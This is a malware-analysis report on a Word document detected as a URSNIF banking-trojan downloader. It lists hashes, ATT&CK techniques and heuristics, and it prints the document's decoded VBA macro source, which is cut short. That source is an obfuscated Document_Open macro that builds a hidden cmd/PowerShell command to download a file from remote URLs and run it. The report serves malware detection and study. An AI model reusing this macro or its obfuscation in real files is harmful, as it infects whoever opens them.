Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 1798d0ca114dc162…

MALICIOUS

Office (OLE)

68.6 KB Created: 2018-09-10 18:14:00 Authoring application: Microsoft Office Word First seen: 2019-08-04
MD5: 5b928f65eebaaf6c84c672d82167243c SHA-1: 2f9a050567f655bb560fea5973be4ed7653307fc SHA-256: 1798d0ca114dc162c57600c45ecc01b68a412fa9bfbce0ad58a173187470da4e
182 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File T1059 Command and Scripting Interpreter

The sample contains VBA macros, including a Document_Open macro that utilizes the Shell() function to execute arbitrary commands. This indicates an attempt to download and run a secondary payload. The ClamAV detection name 'Doc.Downloader.URSNIF-6729855-3' strongly suggests a downloader functionality, likely for the URSNIF banking trojan.

Heuristics 5

  • ClamAV: Doc.Downloader.URSNIF-6729855-3 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.URSNIF-6729855-3
  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 6085 bytes
SHA-256: 1405aa48867e9ab02e74dc378d4e75c1c43bc8ac09edf665f04e520babf39f55
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "DScSFWmSd"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_open()
On _
Error _
Resume _
Next
   Second "jB" + "V" + "P" + "pY"
   Second "smDijYr" + "498506569" + "199925522" + "IlIv"
   Second "8096" + "2801" + "l" + "XzZ"
   Second "O" + "YtiFFjwRUtwX"
   Second "t" + "wmPC" + "ArfhE" + "5913"
   Second "108297814" + "tlpZmqaSbIGD" + "uQbZWwKz" + "288079395"
Shell JnIwAcXkDF + ltzXTSIt + shBsvo, CStr(vbHide)
   Second "ip" + "R" + "qJdkao" + "LdYCwXAXjYT"
   Second "BrYuOihP" + "1872" + "286084769" + "W"
End Sub



Attribute VB_Name = "djYMwnQZik"
Function JnIwAcXkDF()

On _
Error _
Resume _
Next
Second "iRiSRcNmEzkC" + "DmMjJO" + "3155" + "HGwZJGVjlYRlh"
   Second "3894" + "73969938" + "5745" + "UEZcVNlOS"
jfupX = Format(Chr(13 + 16 + 18 + 11 + 41)) + "m" + "d " + "/V" + "/" + Format(Chr(9 + 10 + 12 + 7 + 29)) + Format(Chr(4 + 5 + 5 + 3 + 17)) + "se" + "t" + " ^un=" + " " + "  ^ ^ ^" + " " + "^ " + "  ^ ^  " + "^  "
Second "3135" + "1444"
XszRsqnN = "^" + "   ^}" + "}{^h" + Format(Chr(13 + 16 + 18 + 11 + 41)) + "^t" + "a" + Format(Chr(13 + 16 + 18 + 11 + 41)) + "};^k^" + "aer^b^;" + "hNQ$ m^" + "e" + "^" + "tI-"
Second "YVkuvh" + "5609"
   Second "F" + "8511" + "7522" + "jB"
Fnofi = "ek^ov" + "nI;" + ")hNQ" + "^$ " + ",m^j^a" + "^$(" + "e^li^F" + "d^a^o" + "^l" + "n^wo^"
Second "wiaVNODsP" + "120023095"
   Second "ni" + "SEJLGhB" + "fzUHikhFk" + "6915"
   Second "NLQ" + "GAvwjWMj"
tcYUi = "D" + ".VAJ^$" + "^{^yr" + "t^" + "{)" + "^Qa^i" + "^$ n^i^" + " m^ja" + "^$(^h" + Format(Chr(13 + 16 + 18 + 11 + 41)) + "a" + "^er^" + "o^f;'^"
Second "zrz" + "16939862"
   Second "UMdU" + "4337"
KdLDSJmQQBi = "e" + "x^e^.'+" + "^z^" + "B^z$+^" + "'^\'^+" + Format(Chr(13 + 16 + 18 + 11 + 41)) + "^il^b^" + "u^p" + "^:vne^" + "$^=" + "^hN^" + "Q$^;^'" + "0^52" + "^' ^=^"
Second "G" + "XdGUwPGYDE"
   Second "1888" + "CK" + "k" + "JTSZ"
   Second "4176" + "174622993"
   Second "ar" + "RJ" + "jMS" + "D"
qXwkdMuzMCI = " ^z^" + "B^z^$;)" + "^" + "'^@'(^" + "ti^lpS." + "'E6P^" + "1^" + "J^1" + "Y" + "/^" + "mo" + Format(Chr(13 + 16 + 18 + 11 + 41))
JnIwAcXkDF = jfupX + XszRsqnN + Fnofi + tcYUi + KdLDSJmQQBi + qXwkdMuzMCI
   Second "390739740" + "WAQ" + "HiH" + "4145"
   Second "iR" + "U" + "zN" + "2541"
   Second "386758781" + "435859074"
End Function
Function ltzXTSIt()

On _
Error _
Resume _
Next
Second "5891" + "380088353" + "256706086" + "534720716"
owBYP = ".x" + "r" + "sha/" + "/" + ":p^" + "t" + "t^h" + "@" + "6VTdy" + "y^x/r" + "b.^m"
Second "469443791" + "5820" + "447736913" + "520975922"
   Second "9380" + "4185"
   Second "ITBVtRVZotphpQ" + "wzANukuJUt" + "o" + "125622862"
   Second "XXFSAB" + "7054" + "c" + "ucJi"
azmBVtWXC = "^o" + Format(Chr(13 + 16 + 18 + 11 + 41)) + "^." + "t^lu" + Format(Chr(13 + 16 + 18 + 11 + 41)) + "omso" + Format(Chr(13 + 16 + 18 + 11 + 41)) + "//" + ":p^t" + "th^" + "@^1" + Format(Chr(9 + 10 + 12 + 7 + 29)) + "J^" + "gz^M3^" + "2l" + "f/"
Second "4810" + "186905810"
   Second "iv" + "hTSaMBu"
   Second "3757" + "8772936" + "SO" + "IoCUhON"
   Second "4055" + "bodZdK" + "80243354" + "Rb"
   Second "aXopVCY" + "m" + "3033" + "362418012"
uvYsRs = "z^t" + "^.^o" + Format(Chr(13 + 16 + 18 + 11 + 41)) + "." + "enil^" + "tn" + "^orf" + "//"
Second "5724" + "RCjXlIivw" + "NSVBPnBImnCD" + "169773230"
nSGAtvhL = ":^ptth" + "^@" + "v^q" + "j4l" + "N" + "i^W/tn" + "e^tn^o" + Format(Chr(13 + 16 + 18 + 11 + 41)) + "-pw/" + "m^o" + Format(Chr(13 + 16 + 18 + 11 + 41)) + "^." + "a^t"
Second "bcUwowTz" + "tNsAdKbUN" + "zOuBtInHYoQCkd" + "iPHimbhB"
   Second "322021529" + "11413413" + "APDSdr" + "VBCPuoP"
   Second "r" + "hbXAAIQk" + "kNd" + "zrD"
zdwoHzBZv = "^in" + "^a^" + "w^g" + "n^" + "atn^e" + "^tle^ki" + "tr" + "^a//:^p"
Second "bpBouLjq" + "PIu" + "6504" + "1074"
   Second "mb" + "342785519" + "SMli"
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.